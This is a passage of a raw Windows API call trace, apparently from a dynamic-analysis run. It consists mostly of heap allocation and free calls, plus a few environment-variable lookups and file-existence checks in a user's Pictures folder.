hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.561] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.561] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.564] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.564] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.569] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ul6W7nkKmk8Vcoms6H.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38cc4060, ftCreationTime.dwHighDateTime=0x1d5cdf1, ftLastAccessTime.dwLowDateTime=0x37eac020, ftLastAccessTime.dwHighDateTime=0x1d5c9b6, ftLastWriteTime.dwLowDateTime=0x37eac020, ftLastWriteTime.dwHighDateTime=0x1d5c9b6, nFileSizeHigh=0x0, nFileSizeLow=0x3e21, dwReserved0=0x0, dwReserved1=0x0, cFileName="ul6W7nkKmk8Vcoms6H.gif", cAlternateFileName="UL6W7N~1.GIF")) returned 0x9e1bf8 [0211.570] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.570] PeekMessageW (in: lpMsg=0x8cf708, 